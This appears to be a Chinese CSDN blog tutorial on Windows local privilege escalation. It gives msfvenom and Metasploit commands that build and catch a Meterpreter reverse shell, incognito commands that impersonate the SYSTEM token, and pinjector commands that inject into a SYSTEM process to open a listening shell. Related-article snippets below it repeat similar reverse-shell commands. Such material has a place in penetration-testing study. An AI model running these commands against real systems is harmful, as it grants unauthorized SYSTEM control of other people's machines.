win本地提权令牌窃取&进程注入

最新推荐文章于 2024-07-17 09:37:43 发布
最新推荐文章于 2024-07-17 09:37:43 发布
阅读量100 收藏
点赞数
分类专栏: 内网 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71169068/article/details/130191368
版权

令牌窃取

进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。

这里用msf演示:

msfconsole

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.20 LPORT=4444 -f exe > shell.exe

 use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.10.20

set LPORT 4444

run

 

use incognito
list_tokens -u           #列出有的令牌
impersonate_token "NT AUTHORITY\SYSTEM" #窃取system令牌

 进程注入:

工具:

Tarasco Security: Process Injector

pinjector.exe -l    ##列取所有进程
pinjector.exe -p <pid> cmd <port>  ##选择一个system权限运行的进程,对此pid进程执行注入,并建立侦听端口

 pinjector.exe -p384  cmd 2222

 

 pexec64 32工具

C/C++ 进程代码注入&提权&降权 - lyshark - 博客园 (cnblogs.com)

老六_小二郎
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取进程注入...
PoCs-win提权.zip
04-08
5. **权限令牌窃取**:攻击者获取其他高权限进程令牌,然后将自己的进程与该令牌关联,从而获得相应的权限。 在"PoCs-master"文件夹中,我们可以找到各种不同的PoC实例,每个实例都对应一种或多种提权技术。分析...
提权 - Windows 令牌窃取/进程注入提权
acepanhuan的博客
03-01 520
提权 - Windows 令牌窃取/进程注入提权
提权win本地提权令牌窃取&进程注入
qi_SJQ_的博客
02-02 1200
之前介绍的是web环境下的提权方式,而本地提权可以参考这两种方法,但适用范围受版本限制较大。 Winserver08&win7令牌窃取: 成因:进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。 工具:msf 令牌窃取方式在Windows2008之后的高版本操作系统已经没用了,只能用于一些低版本系统,比如: Microsoft Windows XP Professional SP3和之前版本 Wind
第101天:权限提升-Win 本地用户&进程注入&令牌窃取&AT&SC&PS 服务命令
weixin_71529930的博客
06-05 584
原理是正常上传webshell只能获得web权限,无法提权到system,配合烂土豆,执行,溢出可以获得system权限。利用msf getsystem命令会自动帮你提权到system(在可以提权的条件下)利用工具注入的话,只能适用于2003版本,所以这里利用msf可以通杀。测试的时候发现如果利用该进程好像会把系统打蓝屏,谨慎使用。win2003以下的版本可以利用工具pinjector。个人主机win11,能否成功主要是看是否设置了uac。会弹出窗口进行请求,如果对方点击就能提权,不点就不行。
WIN提权 令牌窃取&进程注入
m0_65096687的博客
05-23 511
令牌,又叫token,是系统临时产生的秘钥,相当于账号密码,用来决定是否允许此次请求和判断此次请求是属于哪一个用户。进程注入就是利用其他应用进程需要使用的system权限来实现我们想要的操作。然后 -p pid cmd.exe 端口号。每个应用程序运行的时候会有进程详细信息。然后运行查看你system 的pid。这里使用msf上自带的令牌窃取模块。然后开个nc会反弹一个cmd窗口。下载pininject 软件。win7一下的版本可以尝试。msf反弹shell上线后。
提权】Postgre&令牌窃取&进程注入
ssrf
06-05 248
文章目录0x001 PostgreSQL数据库权限提升0x002 令牌窃取0x003 进程注入 0x001 PostgreSQL数据库权限提升 PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞:CVE-2019-9193 CVE-2018-1058 连接-利用漏洞-执行-提权 参考:https://vulhub.org/#/environments/postg
windows提权之at&sc&ps&进程注入&令牌窃取
m0_62207170的博客
03-20 749
windows提权之at&sc&ps&进程注入&令牌窃取
权限提升-令牌窃取&进程注入-提权
weixin_45701675的博客
11-19 384
令牌窃取 演示服务器: Win2012 腾讯云服务器 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。 所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。 本地权限 - Test in Win2012腾讯云服务器 msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe 配置监听会话 use exploit/multi/han...
第101天:权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
qq_46081990的博客
06-22 249
【代码】第101天:权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令。
Windows权限提升—令牌窃取、UAC提权进程注入提权
剁椒鱼头没剁椒的博客
03-27 3884
在之前的文章中已经对Windows的权限提升进行了介绍,这里同样不再赘述,如果想要去了解Windows权限提升可以看以下的文章,同时也将Windows权限提升其它的几种办法也放在下面的文章中。同时本来应该还写一篇第三方全家提权的,但是在实际测试过程中发现,有些第三方提权,如果在电脑上都会自动更新,比如向日葵,低版本的直接无法连接向日葵官方的服务器,那么提个毛权限的啊。Windows权限提升—溢出提权Windows权限提升—MySQL数据库提权
vb.rar_VB 提权_进程提权
09-20
在这个“vb.rar_VB 提权_进程提权”的主题中,我们主要关注的是如何在VB.NET环境中实现进程权限的提升,以便能够执行如杀掉任何进程等需要更高权限的操作。 在Windows操作系统中,每个进程都有自己的安全属性,包括...
360本地提权漏洞演示程序
09-13
《360本地提权漏洞演示程序:深入解析与安全防范》 在网络安全领域,"提权"一词常被提及,它指的是攻击者通过利用系统中的漏洞,将权限从低级别提升到高级别,从而获取对系统的更广泛控制。这里的“360本地提权漏洞...
windows账户提权 API.zip
01-22
总的来说,这个压缩包中的资源详细介绍了Windows环境下使用API进行账户提权的各种技术和策略,涵盖了从创建高权限进程到修改系统服务和注册表等多方面。这些技术在系统管理和软件开发中有其应用,但滥用可能会导致...
捷配总结的SMT工厂安全防静电规则
最新发布
tyymm的博客
07-17 486
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这种SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
OWASP 移动应用 2024 十大安全风险
shendong70的博客
07-14 1239
随着智能手机的快速发展,移动应用已经成为我们日常生活关系最密切的软件应用。开放全球应用程序安全项目(OWASP)基金会,致力于提高软件的安全性。自 2014、2016年发布了移动应用的十大风险后,今年再次发布2024版。这对移动应用软件的检查工具有着重要的指导作用。
AI安全系列——[第五空间 2022]AI(持续更新)
2201_76139143的博客
07-15 1011
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
浅谈安数云智能安全运营管理平台:DCS-SOAR
2401_82472120的博客
07-15 802
安数云DCS-SOAR平台致力于解决用户云上资产的安全运营问题,面对用户防护设备繁杂臃肿、安全事件难以及时响应、运营成本逐年上升的困境,安数云DCS-SOAR平台以安全大脑驱动为核心,建立运营体系,通过OneStep框架实现第三方安全产品的“无门槛接入、低门槛纳管”;威胁和告警数量不断增长,资源又不足以应对所有问题,在日常运营中,分析人员需要快速决定哪些告警需要处理,哪些可以忽略,但由于超负荷工作,很可能错过真正的威胁,在应对威胁和恶意攻击时出现误判,最终使网络及数据产生安全泄露,造成无可挽回的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值